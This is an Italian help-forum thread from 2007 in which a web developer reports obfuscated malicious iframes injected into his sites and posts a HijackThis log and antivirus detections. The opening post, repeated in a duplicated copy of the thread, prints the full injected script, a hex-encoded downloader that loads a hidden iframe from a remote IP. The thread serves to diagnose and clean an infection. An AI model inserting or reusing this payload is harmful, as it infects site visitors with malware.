[HELP!] virus e iframe

Argosoft · 13-12-2007, 10:58

Raga... aiuto che casino! c'è un problema che mi sta rovinando!

Il fatto: da un paio di giorni, in tutti i siti su cui lavoro, che ho memorizzato in Dreamweaver (sono un web-developer) sono comparsi degli iframe maligni in ogni pagina index.php, index.htm, index.html, home.php, login.php e auth.php (per ora ho visto queste!)
I siti interessati sono tutti quelli che avevo memorizzati: i siti che ho curato per due aziende diverse e i miei personali. Per non sbagliare, ho immediatamente formattato, reinstallato XP, installato Kaspersky, e cambiato tutte le password FTP dei siti bucati. E oggi.......... torna fuori!!!!!!

Com'è possibile!!!!

il codice che viene inserito è questo :

Codice:

<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v4760ad0e3414e(v4760ad0e344b2){ function v4760ad0e348c8 () {return 16;} return(parseInt(v4760ad0e344b2,v4760ad0e348c8()));}function v4760ad0e350bb(v4760ad0e35a86){ function v4760ad0e3645f () {return 2;} var v4760ad0e35e3b='';for(v4760ad0e3606f=0; v4760ad0e3606f<v4760ad0e35a86.length; v4760ad0e3606f+=v4760ad0e3645f()){ v4760ad0e35e3b+=(String.fromCharCode(v4760ad0e3414e(v4760ad0e35a86.substr(v4760ad0e3606f, v4760ad0e3645f()))));}return v4760ad0e35e3b;} document.write(v4760ad0e350bb('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D396464353535207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3338383638292B273835303237656261375C272077696474683D3739206865696768743D343932207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>

che tradotto carica un file da un ip 77.*** (è un ip russo). Appena formattato e installato l'antivirus, all'apertura della pagina infetta kaspersky s'incavolava segnalando un trojan iframer / downloader, ora invece non lo fa più! AVG segnalava il frame invece come JS/Psyme, ma a quanto leggo c'entra poco con gli effetti che vedo. Scansioni complete con kaspersky, avg, sophos anti-rootkit non trovano assolutamente NULLA. Non capisco!! può essere un pc infetto della rete che riesce a bucare il mio ? Può essere un problema del server? omg... help!

Argosoft · 13-12-2007, 11:03

Log di hijackthis:

Codice:

Logfile of HijackThis v1.99.1
Scan saved at 11.00.29, on 13/12/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16574)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Programmi\Intel\Wireless\Bin\S24EvMon.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\ehome\ehtray.exe
C:\Programmi\Synaptics\SynTP\SynTPEnh.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxpers.exe
C:\Programmi\Intel\Wireless\bin\ZCfgSvc.exe
C:\Programmi\Intel\Wireless\Bin\ifrmewrk.exe
C:\Programmi\SigmaTel\C-Major Audio\WDM\stsystra.exe
C:\WINDOWS\system32\igfxsrvc.exe
C:\Programmi\Creative\VoiceCenter\AndreaVC.exe
C:\Programmi\Creative\SBAudigy\Surround Mixer\CTSysVol.exe
C:\WINDOWS\system32\Rundll32.exe
C:\Programmi\Java\jre1.6.0_03\bin\jusched.exe
C:\Programmi\Kaspersky Lab\Kaspersky Anti-Virus 7.0\avp.exe
C:\WINDOWS\system32\ctfmon.exe
C:\DOCUME~1\Argo\IMPOST~1\Temp\clclean.0001
C:\Programmi\Launchy\Launchy.exe
C:\Programmi\Apache Group\Apache2\bin\ApacheMonitor.exe
C:\Programmi\Apache Group\Apache2\bin\Apache.exe
C:\Programmi\Kaspersky Lab\Kaspersky Anti-Virus 7.0\avp.exe
C:\Programmi\File comuni\Creative Labs Shared\Service\CreativeLicensing.exe
C:\WINDOWS\eHome\ehRecvr.exe
C:\WINDOWS\eHome\ehSched.exe
C:\Programmi\Intel\Wireless\Bin\EvtEng.exe
C:\Programmi\File comuni\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Programmi\MySQL\MySQL Server 5.0\bin\mysqld-nt.exe
C:\Programmi\Apache Group\Apache2\bin\Apache.exe
C:\Programmi\Intel\Wireless\Bin\RegSrvc.exe
C:\Programmi\Intel\Wireless\Bin\WLKeeper.exe
C:\WINDOWS\system32\dllhost.exe
C:\WINDOWS\eHome\ehmsas.exe
C:\Programmi\Intel\Wireless\Bin\Dot1XCfg.exe
C:\Programmi\Mozilla Firefox\firefox.exe
C:\Programmi\FileZilla Client\filezilla.exe
C:\Programmi\Macromedia\Dreamweaver 8\Dreamweaver.exe
C:\Programmi\Windows Live\Messenger\msnmsgr.exe
C:\Programmi\Windows Live\Messenger\usnsvc.exe
C:\Programmi\7-Zip\7zFM.exe
C:\Documents and Settings\Argo\Desktop\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.it/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Collegamenti
O2 - BHO: Supporto di collegamento per Adobe PDF Reader - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programmi\File comuni\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programmi\Java\jre1.6.0_03\bin\ssv.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Guida per l'accesso a Windows Live - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Programmi\File comuni\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O4 - HKLM\..\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32
O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - HKLM\..\Run: [ehTray] C:\WINDOWS\ehome\ehtray.exe
O4 - HKLM\..\Run: [SynTPEnh] C:\Programmi\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [igfxtray] C:\WINDOWS\system32\igfxtray.exe
O4 - HKLM\..\Run: [igfxhkcmd] C:\WINDOWS\system32\hkcmd.exe
O4 - HKLM\..\Run: [igfxpers] C:\WINDOWS\system32\igfxpers.exe
O4 - HKLM\..\Run: [IntelZeroConfig] "C:\Programmi\Intel\Wireless\bin\ZCfgSvc.exe"
O4 - HKLM\..\Run: [IntelWireless] "C:\Programmi\Intel\Wireless\Bin\ifrmewrk.exe" /tf Intel PROSet/Wireless
O4 - HKLM\..\Run: [SigmatelSysTrayApp] %ProgramFiles%\SigmaTel\C-Major Audio\WDM\stsystra.exe
O4 - HKLM\..\Run: [VoiceCenter] "C:\Programmi\Creative\VoiceCenter\AndreaVC.exe" /tray
O4 - HKLM\..\Run: [CTSysVol] C:\Programmi\Creative\SBAudigy\Surround Mixer\CTSysVol.exe /r
O4 - HKLM\..\Run: [MBMon] Rundll32 CTMBHA.DLL,MBMon
O4 - HKLM\..\Run: [UpdReg] C:\WINDOWS\UpdReg.EXE
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Programmi\Java\jre1.6.0_03\bin\jusched.exe"
O4 - HKLM\..\Run: [AVP] "C:\Programmi\Kaspersky Lab\Kaspersky Anti-Virus 7.0\avp.exe"
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Programmi\Adobe\Reader 8.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [WinampAgent] C:\Programmi\Winamp\winampa.exe
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [SetDefaultMIDI] MIDIDef.exe
O4 - Global Startup: Launchy.lnk = C:\Programmi\Launchy\Launchy.exe
O4 - Global Startup: Monitor Apache Servers.lnk = C:\Programmi\Apache Group\Apache2\bin\ApacheMonitor.exe
O8 - Extra context menu item: E&sporta in Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Scarica con il Wizard di LeechGet - file://C:\Programmi\LeechGet 2007\\Wizard.html
O8 - Extra context menu item: Scarica con LeechGet - file://C:\Programmi\LeechGet 2007\\AddUrl.html
O8 - Extra context menu item: Scarica pagina con LeechGet - file://C:\Programmi\LeechGet 2007\\Parser.html
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programmi\Java\jre1.6.0_03\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programmi\Java\jre1.6.0_03\bin\ssv.dll
O9 - Extra button: Web Anti-Virus - {1F460357-8A94-4D71-9CA3-AA4ACF32ED8E} - C:\Programmi\Kaspersky Lab\Kaspersky Anti-Virus 7.0\SCIEPlgn.dll
O9 - Extra button: Ricerche - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programmi\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programmi\Messenger\msmsgs.exe
O11 - Options group: [INTERNATIONAL] International*
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
O18 - Protocol: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\WI1F86~1\MESSEN~1\MSGRAP~1.DLL
O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\WI1F86~1\MESSEN~1\MSGRAP~1.DLL
O20 - Winlogon Notify: igfxcui - C:\WINDOWS\SYSTEM32\igfxdev.dll
O20 - Winlogon Notify: klogon - C:\WINDOWS\system32\klogon.dll
O21 - SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - C:\WINDOWS\system32\WPDShServiceObj.dll
O23 - Service: Apache2 - Unknown owner - C:\Programmi\Apache Group\Apache2\bin\Apache.exe" -k runservice (file missing)
O23 - Service: Kaspersky Anti-Virus 7.0 (AVP) - Unknown owner - C:\Programmi\Kaspersky Lab\Kaspersky Anti-Virus 7.0\avp.exe" -r (file missing)
O23 - Service: Creative Labs Licensing Service - Creative Labs - C:\Programmi\File comuni\Creative Labs Shared\Service\CreativeLicensing.exe
O23 - Service: Intel(R) PROSet/Wireless Event Log (EvtEng) - Intel Corporation - C:\Programmi\Intel\Wireless\Bin\EvtEng.exe
O23 - Service: MySQL - Unknown owner - C:\Programmi\MySQL\MySQL.exe (file missing)
O23 - Service: Intel(R) PROSet/Wireless Registry Service (RegSrvc) - Intel Corporation - C:\Programmi\Intel\Wireless\Bin\RegSrvc.exe
O23 - Service: Intel(R) PROSet/Wireless Service (S24EventMonitor) - Intel Corporation  - C:\Programmi\Intel\Wireless\Bin\S24EvMon.exe
O23 - Service: Intel(R) PROSet/Wireless SSO Service (WLANKEEPER) - Intel Corporation - C:\Programmi\Intel\Wireless\Bin\WLKeeper.exe

secondo le info sui processi risulta tutto regolare.. poi non so. Ora cerco di fare scansioni con tutti gli antivirus possibili, non so proprio più dove sbattere la testa!

Argosoft · 13-12-2007, 11:19

Codice:

AntiVir	: HEUR/Exploit.HTML
AVG: JS/Psyme
ClamAV: JS.Agent-2
F-Secure: Trojan-Clicker.JS.Agent.h
Kaspersky: Trojan-Clicker.JS.Agent.h
Microsoft: TrojanDownloader:JS/Psyme.gen
Sophos: Mal/ObfJS-C
Webwasher-Gateway: Heuristic.Exploit.HTML

Questo è il log di VirusTotal su un file infetto dall'iframe. Resta che non si sa cosa è che li genera sti iframe!

ringrazio in anteprima per la pazienza.

**Chill-Out** · 13-12-2007, 11:25

presumo che il problema stia sul server, magari ci potresti dare qualche info in più, tipo: il server è basatu su Microsoft IIS / Apache e magari anche qualche indirizzo

Argosoft · 13-12-2007, 11:29

Quote:

Originariamente inviato da Chill-Out

presumo che il problema stia sul server, magari ci potresti dare qualche info in più, tipo: il server è basatu su Microsoft IIS / Apache e magari anche qualche indirizzo

Il problema è che sta cosa si è presentata su minimo 4 server diversi in punti diversi del mondo!

Tutti apache su linux.

Le compagnie : Totalchoicehosting (USA), Hostgator (USA), Widestore (ITA), anche su netsons (ITA)

E tutti collegati al mio pc naturalmente!

Riverside · 13-12-2007, 11:30

E si potrebbe andare avanti linkando centinaia di pagine sull'argomento:

http://www.sophos.it/pressoffice/new...curityrep.html

http://www.pcalsicuro.com/main/2007/...n-sia-infetto/

http://www.tuttohosting.it/index.php...=7518&Itemid=1

**Chill-Out** · 13-12-2007, 11:37

Quote:

Originariamente inviato da Argosoft

Il problema è che sta cosa si è presentata su minimo 4 server diversi in punti diversi del mondo!

Tutti apache su linux.

Le compagnie : Totalchoicehosting (USA), Hostgator (USA), Widestore (ITA), anche su netsons (ITA)

E tutti collegati al mio pc naturalmente!

il problema è sui server che sono vulnerabili, hai voglia di cambiare password e ripulire gli IFrame, in quanto i server vengono attaccati in remoto da script presumibilmente automatici. Se hai voglia e puoi fornire gli indirizzi dei siti attaccati, sarebbe interessante in particolare quelli hostati su Widestore

Argosoft · 13-12-2007, 14:56

alllora..

uno su totalchoice : 208.76.82.65
uno su widestore : 85.235.130.48

**Chill-Out** · 13-12-2007, 22:44

Ho fatto un controllo random sui siti hostati su entrambi gli IP, solo un sito risulta infetto.

13-12-2007, 10:58	#1
Argosoft Senior Member Iscritto dal: Aug 2003 Città: addio fabriANO... mò sto a Roma ahò!! Messaggi: 579	[HELP!] virus e iframe Raga... aiuto che casino! c'è un problema che mi sta rovinando! Il fatto: da un paio di giorni, in tutti i siti su cui lavoro, che ho memorizzato in Dreamweaver (sono un web-developer) sono comparsi degli iframe maligni in ogni pagina index.php, index.htm, index.html, home.php, login.php e auth.php (per ora ho visto queste!) I siti interessati sono tutti quelli che avevo memorizzati: i siti che ho curato per due aziende diverse e i miei personali. Per non sbagliare, ho immediatamente formattato, reinstallato XP, installato Kaspersky, e cambiato tutte le password FTP dei siti bucati. E oggi.......... torna fuori!!!!!! Com'è possibile!!!! il codice che viene inserito è questo : Codice: <iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v4760ad0e3414e(v4760ad0e344b2){ function v4760ad0e348c8 () {return 16;} return(parseInt(v4760ad0e344b2,v4760ad0e348c8()));}function v4760ad0e350bb(v4760ad0e35a86){ function v4760ad0e3645f () {return 2;} var v4760ad0e35e3b='';for(v4760ad0e3606f=0; v4760ad0e3606f<v4760ad0e35a86.length; v4760ad0e3606f+=v4760ad0e3645f()){ v4760ad0e35e3b+=(String.fromCharCode(v4760ad0e3414e(v4760ad0e35a86.substr(v4760ad0e3606f, v4760ad0e3645f()))));}return v4760ad0e35e3b;} document.write(v4760ad0e350bb('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D396464353535207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3338383638292B273835303237656261375C272077696474683D3739206865696768743D343932207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script> che tradotto carica un file da un ip 77.*** (è un ip russo). Appena formattato e installato l'antivirus, all'apertura della pagina infetta kaspersky s'incavolava segnalando un trojan iframer / downloader, ora invece non lo fa più! AVG segnalava il frame invece come JS/Psyme, ma a quanto leggo c'entra poco con gli effetti che vedo. Scansioni complete con kaspersky, avg, sophos anti-rootkit non trovano assolutamente NULLA. Non capisco!! può essere un pc infetto della rete che riesce a bucare il mio ? Può essere un problema del server? omg... help! __________________ Tavshan Pasha Bazar: Oggetti etnici per il relax!

13-12-2007, 11:19	#3
Argosoft Senior Member Iscritto dal: Aug 2003 Città: addio fabriANO... mò sto a Roma ahò!! Messaggi: 579	Codice: AntiVir : HEUR/Exploit.HTML AVG: JS/Psyme ClamAV: JS.Agent-2 F-Secure: Trojan-Clicker.JS.Agent.h Kaspersky: Trojan-Clicker.JS.Agent.h Microsoft: TrojanDownloader:JS/Psyme.gen Sophos: Mal/ObfJS-C Webwasher-Gateway: Heuristic.Exploit.HTML Questo è il log di VirusTotal su un file infetto dall'iframe. Resta che non si sa cosa è che li genera sti iframe! ringrazio in anteprima per la pazienza. __________________ Tavshan Pasha Bazar: Oggetti etnici per il relax!

13-12-2007, 11:25	#4
Chill-Out Moderatore Iscritto dal: Jun 2007 Città: 127.0.0.1 Messaggi: 25885	presumo che il problema stia sul server, magari ci potresti dare qualche info in più, tipo: il server è basatu su Microsoft IIS / Apache e magari anche qualche indirizzo __________________ Regole di Sezione ▪ Guida alla Disinfezione ▪ Attenzione: Thread importanti Try again and you will be luckier.

13-12-2007, 14:56	#8
Argosoft Senior Member Iscritto dal: Aug 2003 Città: addio fabriANO... mò sto a Roma ahò!! Messaggi: 579	alllora.. uno su totalchoice : 208.76.82.65 uno su widestore : 85.235.130.48 __________________ Tavshan Pasha Bazar: Oggetti etnici per il relax!

13-12-2007, 22:44	#9
Chill-Out Moderatore Iscritto dal: Jun 2007 Città: 127.0.0.1 Messaggi: 25885	Ho fatto un controllo random sui siti hostati su entrambi gli IP, solo un sito risulta infetto. __________________ Regole di Sezione ▪ Guida alla Disinfezione ▪ Attenzione: Thread importanti Try again and you will be luckier.

13-12-2007, 11:30	#6
Riverside Bannato Iscritto dal: Jul 2007 Città: Riverside House Messaggi: 3333	E si potrebbe andare avanti linkando centinaia di pagine sull'argomento: http://www.sophos.it/pressoffice/new...curityrep.html http://www.pcalsicuro.com/main/2007/...n-sia-infetto/ http://www.tuttohosting.it/index.php...=7518&Itemid=1

Strumenti
Mostra una versione stampabile Invia questa pagina per email